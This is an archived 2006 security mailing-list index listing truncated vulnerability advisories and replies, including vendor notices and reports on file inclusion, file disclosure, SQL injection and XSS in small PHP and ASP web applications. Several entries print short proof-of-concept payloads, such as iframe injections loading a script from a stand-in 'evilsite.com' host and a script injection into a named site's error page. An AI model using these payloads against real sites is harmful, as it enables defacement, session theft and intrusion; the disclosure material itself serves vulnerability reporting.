|
Colapse all |
Post message
aWebNews <= 1.0 (login.php) Remote DocumentRoot file disclosure 2006-06-06 Federico Fazzi (federico autistici org) */ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]> */ aWebNews <= 1.0 (login.php) Remote DocumentRoot file disclosure */ 04/06/2006 5:48 login.php: line 64-68, Bug: -- start -- if ($_GET['page'] == "") { $pagetogo = "index.php"; } else { $pagetogo = $_GET['page']; } -- end -- Proof of concept: Open th [ more ] [ reply ] Re: IRM 019: MailMarshal 6.1 SMTP MTA Content Filter Bypass 2006-06-07 phil mccracken fatchickswithglamourshots com This advisory is rather useless without the actual .reg file information. It's also rather asinine, since any content filter can be "bypassed" in this manner by simply encrypting a ZIP, RAR, or the archive of your choosing. This is the equivalent of saying "we have found a vulnerability in the Logit [ more ] [ reply ] BloggIT <= 1.01 (admin.php) Arbitrary code execution 2006-06-06 Federico Fazzi (federico autistici org) */ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]> */ BloggIT <= 1.01 (admin.php) Arbitrary code execution */ 04/06/2006 5:48 Bug: The BloggIT have on the admin.php: require("session.inc.php"); //- session_start(); //- if ($_SESSION['login'] != "ok") header("Location: index.php"); and require() functio [ more ] [ reply ] bug on showwich.asp 2006-06-07 ip chat yahoo com ################ Azhteam Digital Security Team ################# # # showwish.asp # # Find by Soltan_defacer # Greetings; s.defacer - azhteam - lvl3hr # # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Contact: soltan_defacer@xxxxxxxxx or http://www.azhteam.com [ more ] [ reply ] [ GLSA 200606-02 ] shadow: Privilege escalation 2006-06-07 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Re: Squirrelmail local file inclusion 2006-06-06 Steven M. Christey (coley mitre org) Paul Schmehl said: >This is the second "bug" I've seen in the past week that requires >register_globals to be on. Yet register_globals has been off by >default for the past four years. But after a disclosure of a PHP issue with a functioning exploit, many sites are regularly hacked soon afterwar [ more ] [ reply ] Re: [MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability 2006-06-06 admin majorsecurity de Please update my advisory. After posting up my advisory I have seen that 2 other php-files are also affected by this vulnerability. Input passed to the "da_path" parameter in "auth.cookie.inc.php", "auth.header.inc.php" and "auth.sessions.inc.php" is not properly verified, before it is used to [ more ] [ reply ] libgd 2.0.33 infinite loop in GIF decoding ? 2006-06-06 rocheml httrack com 0. Introduction --------------- (from <http://www.boutell.com/gd/>) GD is an open source code library for the dynamic creation of images by programmers. GD is written in C, and "wrappers" are available for Perl, PHP and other languages. GD creates PNG, JPEG and GIF images, among other formats. GD i [ more ] [ reply ] [SECURITY] [DSA 1090-1] New spamassassin packages fix remote command execution 2006-06-06 joey infodrom org (Martin Schulze) IRM 019: MailMarshal 6.1 SMTP MTA Content Filter Bypass 2006-06-06 IRM Advisories (advisories irmplc com) MailMarshal 6.1 SMTP MTA Content Filter Bypass Vulnerability Type / Importance: Active Content Filter Bypass / High Problem Discovered: 24 February 2006 Vendor Contacted: 24 February 2006 Advisory Published: 5 June 2006 ------------------------------------------------- Abstract: Marshal MailMars [ more ] [ reply ] Asterisk 1.2.9 and Asterisk 1.0.11 Released - Security Fix 2006-06-06 Matt Riddell (IT) (matt riddell sineapps com) The Asterisk Development Team today released Asterisk 1.2.9 and Asterisk 1.0.11 to address a security vulnerability in the IAX2 channel driver (chan_iax2). The vulnerability affects all users with IAX2 clients that might be compromised or used by a malicious user, and can lead to denial of service a [ more ] [ reply ] Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit 2006-06-06 Steven M. Christey (coley mitre org) nukedx said: >This is not vulnerable,PHP-Nuke having a special in their files and >when includes mainfile.php it overwrites the global variables and it >caused to make an arbitrary file inclusion. > >But in MyBloggie there is no common vulnerability like it. In the source code for 2.1.1, many fil [ more ] [ reply ] [ MDKSA-2006:095 ] - Updated libtiff packages fixes tiffsplit vulnerability 2006-06-06 security mandriva com ParticleSoft Wiki v1.0.2 2006-06-06 luny youfucktard com ParticleSoft Wiki v1.0.2 Effected files: input boxes on editing pages: XSS Proof of concept: We notice br tags are allowed, so by using a STYLE attribute using a comment to break up expression we can create a XSS vuln: Put the following in when editing a page: <br IMG STYLE="xss:ex [ more ] [ reply ] ParticleSoft Whois v1.0.3 2006-06-06 luny youfucktard com ParticleSoft Whois v1.0.3 Homepage: http://www.particlesoft.net/particlewhois/ XSS Proof of concept viaurl injection: http://whois.particlesoft.net/index.php?do=runcheck&target="><iframe src=http://evilsite.com/scriptlet.html <<"&ext=all XSS Via input box: "><iframe src=http://evilsite.c [ more ] [ reply ] Particle Gallery v1.0.0 2006-06-05 luny youfucktard com Homepage: http://www.particlesoft.net/particlegallery/ Effected files: viewimage.php viewalbum.php SQL Injection: http://www.example.com/viewimage.php?imageid=' XSS Vulnerability proof of concept: http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsi te.com/scriptlet. [ more ] [ reply ] Multiple file include exploits in Xtreme Downloads v.1.0 2006-06-05 black code (black-cod3 hotmail com) Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include #################################################### exploits : download.php http://www.example.com/path/download.php?root= [ more ] [ reply ] |
|
Privacy Statement |
Runing HTML Codes, JScript etch...
XSS Vulerability URL : http://www.larkinweb.com/secure/error.asp?msg=[XSS]
Example:
http://www.larkinweb.com/secure/error.asp?msg=<script>window.locati
[ more ] [ reply ]